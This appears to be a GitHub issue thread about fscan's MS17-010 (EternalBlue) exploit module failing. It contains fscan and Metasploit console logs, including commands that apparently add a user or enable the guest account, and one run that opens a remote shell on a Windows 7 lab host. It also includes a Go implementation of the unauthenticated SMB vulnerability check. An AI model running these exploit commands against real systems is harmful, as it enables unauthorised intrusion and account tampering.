fscan
MS17-010 cannot be exploited (Issue #202)
```
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc add
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
completed 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.1.95 is alive
[*] Icmp alive hosts len is: 1
192.168.1.95:445 open
[*] alive ports len is: 1
start vulscan
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
completed 1/1
[*] scan finished, elapsed: 88.0051ms
```

```
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc guest
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
completed 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.1.95 is alive
[*] Icmp alive hosts len is: 1
[*] alive ports len is: 1
start vulscan
192.168.1.95:445 open
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
completed 1/1
[*] scan finished, elapsed: 89.0051ms
```

You can run with -debug 0 to see the error. The exploit function ends with common.LogSuccess("[*] " + info.Host + " MS17-010 exploit end"); that line does not appear here, so the exploit probably did not succeed.
```
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc add -debug 0
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.1.95 is alive
[*] Icmp alive hosts len is: 1
[*] alive ports len is: 1
start vulscan
192.168.1.95:445 open
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
completed 0/1 failed to send nt trans: write tcp 192.168.17.15:55504->192.168.1.95:445: use of closed network connection
completed 0/1 [-] Ms17010 192.168.1.95 write tcp 192.168.17.15:55492->192.168.1.95:445: wsasend: An existing connection was forcibly closed by the remote host.
completed 1/1
[*] scan finished, elapsed: 36.0021ms
```
Addendum: same result with the AV turned off.
In your current environment, does Msf windows/smb/ms17_010_eternalblue exploit it successfully?
```
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.95
rhosts => 192.168.1.95
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.17.15:4444
[*] 192.168.1.95:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.95:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.95:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.95:445 - The target is vulnerable.
[*] 192.168.1.95:445 - Connecting to target for exploitation.
[+] 192.168.1.95:445 - Connection established for exploitation.
[+] 192.168.1.95:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.95:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.1.95:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.1.95:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 192.168.1.95:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 192.168.1.95:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.1.95:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.95:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.95:445 - Sending all but last fragment of exploit packet
[-] 192.168.1.95:445 - Errno::ECONNRESET: An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```
Here too the remote host closes the connection; it may be a problem with my environment.
Then the ms17_010_eternalblue module probably fails in your current environment. In some cases, even though the target is Win7 or Win2008, ms17_010_eternalblue still cannot necessarily exploit it.
But in an environment where it can be exploited, fscan still can't do it ¯\_(ツ)_/¯
```
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.16.118 -m ms17010 -sc guest
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.16.118 is alive
[*] Icmp alive hosts len is: 1
192.168.16.118:445 open
[*] alive ports len is: 1
start vulscan
[+] 192.168.16.118 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
completed 1/1
[*] scan finished, elapsed: 233.0133ms
```

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] 192.168.16.118:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.16.118:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.16.118:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.16.118:445 - The target is vulnerable.
[*] 192.168.16.118:445 - Connecting to target for exploitation.
[+] 192.168.16.118:445 - Connection established for exploitation.
[+] 192.168.16.118:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.16.118:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.16.118:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.16.118:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.16.118:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.16.118:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.16.118:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.16.118:445 - Sending all but last fragment of exploit packet
[*] 192.168.16.118:445 - Starting non-paged pool grooming
[+] 192.168.16.118:445 - Sending SMBv2 buffers
[+] 192.168.16.118:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.16.118:445 - Sending final SMBv2 buffers.
[*] 192.168.16.118:445 - Sending last fragment of exploit packet!
[*] 192.168.16.118:445 - Receiving response from exploit packet
[+] 192.168.16.118:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.16.118:445 - Sending egg to corrupted connection.
[*] 192.168.16.118:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.16.118:4444
[*] Sending stage (336 bytes) to 192.168.16.118
[+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (192.168.17.15:60165 -> 192.168.16.118:4444) at 2022-07-05 12:49:07 +0800

Shell Banner: Microsoft Windows [_ 6.1.7601]

C:\Windows\system32>
```
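Every run in this thread reports the target as vulnerable before any exploit traffic is sent: fscan's `[+] ... MS17-010 (...)` line and Metasploit's `Host is likely VULNERABLE to MS17-010!` both come from the same unauthenticated probe (SMBv1 negotiate, null session setup, tree connect to IPC$, then an SMB_COM_TRANSACTION with the PeekNamedPipe subcommand on FID 0; an unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES). Passing that probe says nothing about whether the pool groom, the overwrite and the shellcode stages that follow will survive, which is exactly where both tools die against 192.168.1.95 with a connection reset. The probe on its own, written as an added example in Go for this page and not taken from fscan or Metasploit: the header flag choices, the arbitrary PID 0x2f4b, the 5/10-second timeouts and the verdict strings are this example's own, and the reply used in its test is constructed, not a capture from the thread.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"io"
	"net"
	"time"
)

// NTSTATUS values the PeekNamedPipe probe on FID 0 is known to come back with.
const StatusInsuffServerResources uint32 = 0xC0000205 // unpatched srv.sys: MS17-010 likely present
const StatusInvalidHandle uint32 = 0xC0000008         // patched behaviour
const StatusAccessDenied uint32 = 0xC0000022          // null session refused: inconclusive, not "patched"

func le16(v uint16) []byte { b := make([]byte, 2); binary.LittleEndian.PutUint16(b, v); return b }
func cat(parts ...[]byte) []byte { return bytes.Join(parts, nil) }
func NTStatus(smb []byte) uint32 { return binary.LittleEndian.Uint32(smb[5:9]) } // status field of a raw SMB message
func readN(c net.Conn, n int) ([]byte, error) { b := make([]byte, n); _, err := io.ReadFull(c, b); return b, err }

// smbHeader: 32-byte SMBv1 header. Flags 0x18 = canonical paths, case-insensitive. Flags2 0x4001 = NT status codes +
// long names, UNICODE/EXTENDED_SECURITY off (ASCII strings, legacy non-SPNEGO session setup). Then 12 zero bytes
// (PIDHigh, signature, reserved), TID, arbitrary PID, UID, MID 1.
func smbHeader(cmd byte, tid, uid uint16) []byte {
	return cat([]byte("\xffSMB"), []byte{cmd}, make([]byte, 4), []byte{0x18}, le16(0x4001),
		make([]byte, 12), le16(tid), le16(0x2f4b), le16(uid), le16(1))
}

// NegotiateReq offers only the NT LM 0.12 dialect: WordCount 0, ByteCount 12, dialect string.
func NegotiateReq() []byte {
	return cat(smbHeader(0x72, 0, 0), []byte{0}, le16(12), []byte("\x02NT LM 0.12\x00"))
}

// SessionSetupReq: anonymous Session Setup AndX, WordCount 13: AndX none, MaxBufferSize 4356, MaxMpxCount 2, VcNumber 1,
// SessionKey 0, OEM password len 1, Unicode password len 0, Reserved, Capabilities NT_SMBS|STATUS32 (0x50);
// ByteCount 5: one NUL each for OEM password, account name, primary domain, native OS, native LanMan.
func SessionSetupReq() []byte {
	return cat(smbHeader(0x73, 0, 0), []byte{13, 0xff, 0, 0, 0}, le16(4356), le16(2), le16(1), make([]byte, 4),
		le16(1), le16(0), make([]byte, 4), []byte{0x50, 0, 0, 0}, le16(5), make([]byte, 5))
}

// TreeConnectReq: Tree Connect AndX to IPC$, WordCount 4: AndX none, Flags 0, PasswordLength 1.
func TreeConnectReq(host string, uid uint16) []byte {
	data := []byte("\x00\\\\" + host + "\\IPC$\x00?????\x00") // NUL password, UNC path, service "?????"
	return cat(smbHeader(0x75, 0, uid), []byte{4, 0xff, 0, 0, 0}, le16(0), le16(1), le16(uint16(len(data))), data)
}

// PeekNamedPipeReq is the probe: SMB_COM_TRANSACTION, WordCount 16: TotalParam 0, TotalData 0, MaxParam/MaxData 0xffff,
// MaxSetup 0, Rsvd, Flags 0, Timeout 0, Rsvd2, ParamCount 0, ParamOffset 0x4a, DataCount 0, DataOffset 0x4a, SetupCount 2,
// Rsvd3, Setup {PeekNamedPipe 0x23, FID 0}; ByteCount 7, name "\PIPE\". 0x4a is the whole message length: no params, no data.
func PeekNamedPipeReq(tid, uid uint16) []byte {
	return cat(smbHeader(0x25, tid, uid), []byte{16}, le16(0), le16(0), le16(0xffff), le16(0xffff), []byte{0, 0},
		le16(0), make([]byte, 4), le16(0), le16(0), le16(0x4a), le16(0), le16(0x4a), []byte{2, 0},
		le16(0x23), le16(0), le16(7), []byte("\\PIPE\\\x00"))
}

func Classify(status uint32) string { // only STATUS_INSUFF_SERVER_RESOURCES means "unpatched"
	switch status {
	case StatusInsuffServerResources:
		return "likely VULNERABLE (unpatched srv.sys); this is the pre-exploitation check only"
	case StatusInvalidHandle:
		return "patched"
	}
	return fmt.Sprintf("inconclusive: status 0x%08x", status)
}

// exchange frames one SMB message in a NetBIOS session header, sends it and reads one reply.
func exchange(c net.Conn, smb []byte) ([]byte, error) {
	if _, err := c.Write(cat([]byte{0, byte(len(smb) >> 16), byte(len(smb) >> 8), byte(len(smb))}, smb)); err != nil {
		return nil, err
	}
	hdr, err := readN(c, 4)
	if err != nil {
		return nil, err
	}
	resp, err := readN(c, int(hdr[1])<<16|int(hdr[2])<<8|int(hdr[3]))
	if err == nil && (len(resp) < 32 || smb[4] != 0x25 && NTStatus(resp) != 0) { // only the probe itself may "fail"
		err = fmt.Errorf("command 0x%02x: short or rejected reply (%d bytes)", smb[4], len(resp))
	}
	return resp, err
}

func Check(host string) (string, error) { // negotiate, null session, IPC$ tree connect, probe, verdict
	c, err := net.DialTimeout("tcp", net.JoinHostPort(host, "445"), 5*time.Second)
	if err != nil {
		return "", err
	}
	defer c.Close()
	c.SetDeadline(time.Now().Add(10 * time.Second))
	var r []byte
	var tid, uid uint16
	for _, build := range []func() []byte{NegotiateReq, SessionSetupReq,
		func() []byte { return TreeConnectReq(host, uid) }, func() []byte { return PeekNamedPipeReq(tid, uid) }} {
		if r, err = exchange(c, build()); err != nil {
			return "", err
		}
		tid, uid = binary.LittleEndian.Uint16(r[24:26]), binary.LittleEndian.Uint16(r[28:30]) // server-assigned IDs
	}
	return Classify(NTStatus(r)), nil
}
```

`Check(host)` returns the verdict string; a two-line `main` that passes `os.Args[1]` turns it into a CLI. A target that requires SMB signing or refuses null sessions produces an error or an "inconclusive" verdict rather than "patched", and a "likely VULNERABLE" verdict is the same statement fscan and msf print before the exploit, not evidence that the exploit will work.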
I just updated the code and the exe. Could you try again? That said, fscan's ms17 exploit is only meant as a fallback; dedicated MS17-010 exploitation tools are recommended instead.
Could you publish a Windows x64 release? I don't have a Go environment locally ( ̄m ̄)
Updated in Release.
```
D:\tool> ./main.exe -h 192.168.16.118 -m ms17010 -sc add -debug 0
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.16.118 is alive
[*] Icmp alive hosts len is: 1
[*] alive ports len is: 1
192.168.16.118:445 open
start vulscan
[+] 192.168.16.118 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[*] 192.168.16.118 MS17-010 exploit end
completed 1/1
[*] scan finished, elapsed: 47.0027ms
```
That fast can't be right.....
I'll analyze the payload when I have time next month. This module is quite hard to get right.